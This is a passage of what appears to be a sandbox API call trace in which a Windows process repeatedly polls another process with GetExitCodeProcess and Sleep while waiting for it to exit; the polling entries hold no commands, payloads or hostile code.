(dwMilliseconds=0x19) [0098.537] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.537] Sleep (dwMilliseconds=0x19) [0098.563] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.563] Sleep (dwMilliseconds=0x19) [0098.589] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.589] Sleep (dwMilliseconds=0x19) [0098.616] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.616] Sleep (dwMilliseconds=0x19) [0098.643] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.643] Sleep (dwMilliseconds=0x19) [0098.669] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.669] Sleep (dwMilliseconds=0x19) [0098.722] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.722] Sleep (dwMilliseconds=0x19) [0098.780] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.780] Sleep (dwMilliseconds=0x19) [0098.847] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.847] Sleep (dwMilliseconds=0x19) [0098.898] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.898] Sleep (dwMilliseconds=0x19) [0098.937] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.937] Sleep (dwMilliseconds=0x19) [0098.963] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.963] Sleep (dwMilliseconds=0x19) [0098.989] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0098.989] Sleep (dwMilliseconds=0x19) [0099.019] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.019] Sleep (dwMilliseconds=0x19) [0099.047] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.047] Sleep (dwMilliseconds=0x19) [0099.077] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.077] Sleep (dwMilliseconds=0x19) [0099.171] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.171] Sleep (dwMilliseconds=0x19) [0099.214] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.214] Sleep (dwMilliseconds=0x19) [0099.249] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.249] Sleep (dwMilliseconds=0x19) [0099.280] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.280] Sleep (dwMilliseconds=0x19) [0099.335] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.335] Sleep (dwMilliseconds=0x19) [0099.386] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.386] Sleep (dwMilliseconds=0x19) [0099.506] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.506] Sleep (dwMilliseconds=0x19) [0099.545] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.545] Sleep (dwMilliseconds=0x19) [0099.596] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.596] Sleep (dwMilliseconds=0x19) [0099.636] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.636] Sleep (dwMilliseconds=0x19) [0099.663] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.663] Sleep (dwMilliseconds=0x19) [0099.690] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.690] Sleep (dwMilliseconds=0x19) [0099.726] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.726] Sleep (dwMilliseconds=0x19) [0099.791] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.791] Sleep (dwMilliseconds=0x19) [0099.917] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.917] Sleep (dwMilliseconds=0x19) [0099.947] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.947] Sleep (dwMilliseconds=0x19) [0099.974] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0099.974] Sleep (dwMilliseconds=0x19) [0100.001] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.001] Sleep (dwMilliseconds=0x19) [0100.094] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.094] Sleep (dwMilliseconds=0x19) [0100.180] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.181] Sleep (dwMilliseconds=0x19) [0100.239] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.239] Sleep (dwMilliseconds=0x19) [0100.329] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.329] Sleep (dwMilliseconds=0x19) [0100.365] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.365] Sleep (dwMilliseconds=0x19) [0100.415] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.415] Sleep (dwMilliseconds=0x19) [0100.501] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.502] Sleep (dwMilliseconds=0x19) [0100.541] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.541] Sleep (dwMilliseconds=0x19) [0100.582] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.582] Sleep (dwMilliseconds=0x19) [0100.622] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.622] Sleep (dwMilliseconds=0x19) [0100.657] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.657] Sleep (dwMilliseconds=0x19) [0100.692] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.692] Sleep (dwMilliseconds=0x19) [0100.719] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.719] Sleep (dwMilliseconds=0x19) [0100.786] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.786] Sleep (dwMilliseconds=0x19) [0100.822] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0100.822] Sleep (dwMilliseconds=0x19) [0101.049] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.049] Sleep (dwMilliseconds=0x19) [0101.085] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.085] Sleep (dwMilliseconds=0x19) [0101.145] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.146] Sleep (dwMilliseconds=0x19) [0101.294] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.295] Sleep (dwMilliseconds=0x19) [0101.363] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.363] Sleep (dwMilliseconds=0x19) [0101.409] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.409] Sleep (dwMilliseconds=0x19) [0101.545] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.545] Sleep (dwMilliseconds=0x19) [0101.591] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.591] Sleep (dwMilliseconds=0x19) [0101.716] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.716] Sleep (dwMilliseconds=0x19) [0101.753] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.753] Sleep (dwMilliseconds=0x19) [0101.790] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.790] Sleep (dwMilliseconds=0x19) [0101.876] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.876] Sleep (dwMilliseconds=0x19) [0101.911] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0101.911] Sleep (dwMilliseconds=0x19) [0102.009] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.009] Sleep (dwMilliseconds=0x19) [0102.239] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.239] Sleep (dwMilliseconds=0x19) [0102.284] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.284] Sleep (dwMilliseconds=0x19) [0102.342] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.342] Sleep (dwMilliseconds=0x19) [0102.382] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.382] Sleep (dwMilliseconds=0x19) [0102.517] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.517] Sleep (dwMilliseconds=0x19) [0102.577] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.577] Sleep (dwMilliseconds=0x19) [0102.614] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.614] Sleep (dwMilliseconds=0x19) [0102.676] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.677] Sleep (dwMilliseconds=0x19) [0102.716] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.716] Sleep (dwMilliseconds=0x19) [0102.754] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.754] Sleep (dwMilliseconds=0x19) [0102.814] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.814] Sleep (dwMilliseconds=0x19) [0102.867] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.868] Sleep (dwMilliseconds=0x19) [0102.912] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.912] Sleep (dwMilliseconds=0x19) [0102.980] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0102.980] Sleep (dwMilliseconds=0x19) [0103.030] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.031] Sleep (dwMilliseconds=0x19) [0103.070] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.070] Sleep (dwMilliseconds=0x19) [0103.106] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.106] Sleep (dwMilliseconds=0x19) [0103.143] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.143] Sleep (dwMilliseconds=0x19) [0103.181] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.181] Sleep (dwMilliseconds=0x19) [0103.217] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.217] Sleep (dwMilliseconds=0x19) [0103.265] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.265] Sleep (dwMilliseconds=0x19) [0103.318] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.318] Sleep (dwMilliseconds=0x19) [0103.368] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.368] Sleep (dwMilliseconds=0x19) [0103.497] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.497] Sleep (dwMilliseconds=0x19) [0103.557] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.558] Sleep (dwMilliseconds=0x19) [0103.745] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.745] Sleep (dwMilliseconds=0x19) [0103.893] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0103.893] Sleep (dwMilliseconds=0x19) [0104.030] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.030] Sleep (dwMilliseconds=0x19) [0104.079] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.079] Sleep (dwMilliseconds=0x19) [0104.121] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.121] Sleep (dwMilliseconds=0x19) [0104.160] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.160] Sleep (dwMilliseconds=0x19) [0104.198] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.198] Sleep (dwMilliseconds=0x19) [0104.249] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.249] Sleep (dwMilliseconds=0x19) [0104.288] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.288] Sleep (dwMilliseconds=0x19) [0104.348] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.348] Sleep (dwMilliseconds=0x19) [0104.391] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.392] Sleep (dwMilliseconds=0x19) [0104.496] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.496] Sleep (dwMilliseconds=0x19) [0104.546] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.546] Sleep (dwMilliseconds=0x19) [0104.596] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.596] Sleep (dwMilliseconds=0x19) [0104.649] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.649] Sleep (dwMilliseconds=0x19) [0104.690] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.690] Sleep (dwMilliseconds=0x19) [0104.726] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.726] Sleep (dwMilliseconds=0x19) [0104.778] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.778] Sleep (dwMilliseconds=0x19) [0104.814] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.815] Sleep (dwMilliseconds=0x19) [0104.870] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.870] Sleep (dwMilliseconds=0x19) [0104.916] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.916] Sleep (dwMilliseconds=0x19) [0104.965] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0104.966] Sleep (dwMilliseconds=0x19) [0105.006] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.006] Sleep (dwMilliseconds=0x19) [0105.046] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.046] Sleep (dwMilliseconds=0x19) [0105.131] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.131] Sleep (dwMilliseconds=0x19) [0105.166] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.166] Sleep (dwMilliseconds=0x19) [0105.225] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.225] Sleep (dwMilliseconds=0x19) [0105.282] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.282] Sleep (dwMilliseconds=0x19) [0105.329] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.329] Sleep (dwMilliseconds=0x19) [0105.372] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.372] Sleep (dwMilliseconds=0x19) [0105.509] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.509] Sleep (dwMilliseconds=0x19) [0105.557] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.557] Sleep (dwMilliseconds=0x19) [0105.601] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.601] Sleep (dwMilliseconds=0x19) [0105.682] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.682] Sleep (dwMilliseconds=0x19) [0105.770] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.770] Sleep (dwMilliseconds=0x19) [0105.819] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.820] Sleep (dwMilliseconds=0x19) [0105.899] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.899] Sleep (dwMilliseconds=0x19) [0105.937] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.937] Sleep (dwMilliseconds=0x19) [0105.974] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0105.975] Sleep (dwMilliseconds=0x19) [0106.043] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.044] Sleep (dwMilliseconds=0x19) [0106.118] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.118] Sleep (dwMilliseconds=0x19) [0106.176] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.176] Sleep (dwMilliseconds=0x19) [0106.240] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.240] Sleep (dwMilliseconds=0x19) [0106.312] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.312] Sleep (dwMilliseconds=0x19) [0106.382] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.382] Sleep (dwMilliseconds=0x19) [0106.633] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.633] Sleep (dwMilliseconds=0x19) [0106.708] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.709] Sleep (dwMilliseconds=0x19) [0106.783] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0106.784] Sleep (dwMilliseconds=0x19) [0107.017] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0107.017] Sleep (dwMilliseconds=0x19) [0107.090] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0107.090] Sleep (dwMilliseconds=0x19) [0107.161] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0107.162] Sleep (dwMilliseconds=0x19) [0107.232] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0107.232] Sleep (dwMilliseconds=0x19) [0107.365] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0107.366] Sleep (dwMilliseconds=0x19) [0107.443] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0107.443] Sleep (dwMilliseconds=0x19) [0107.645] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0107.647] Sleep (dwMilliseconds=0x19) [0107.733] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0107.739] Sleep (dwMilliseconds=0x19) [0107.807] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0107.807] Sleep (dwMilliseconds=0x19) [0107.896] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0107.896] Sleep (dwMilliseconds=0x19) [0107.968] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0107.969] Sleep (dwMilliseconds=0x19) [0108.056] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0108.056] Sleep (dwMilliseconds=0x19) [0108.129] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0108.129] Sleep (dwMilliseconds=0x19) [0108.198] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0108.198] Sleep (dwMilliseconds=0x19) [0108.274] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0108.274] Sleep (dwMilliseconds=0x19) [0108.344] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0108.345] Sleep (dwMilliseconds=0x19) [0108.413] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0108.413] Sleep (dwMilliseconds=0x19) [0108.650] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0108.650] Sleep (dwMilliseconds=0x19) [0108.723] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0108.724] Sleep (dwMilliseconds=0x19) [0108.795] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0108.795] Sleep (dwMilliseconds=0x19) [0108.892] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0108.892] Sleep (dwMilliseconds=0x19) [0108.965] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0108.965] Sleep (dwMilliseconds=0x19) [0109.035] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.035] Sleep (dwMilliseconds=0x19) [0109.107] GetExitCodeProcess (in: hProcess=0x40c, 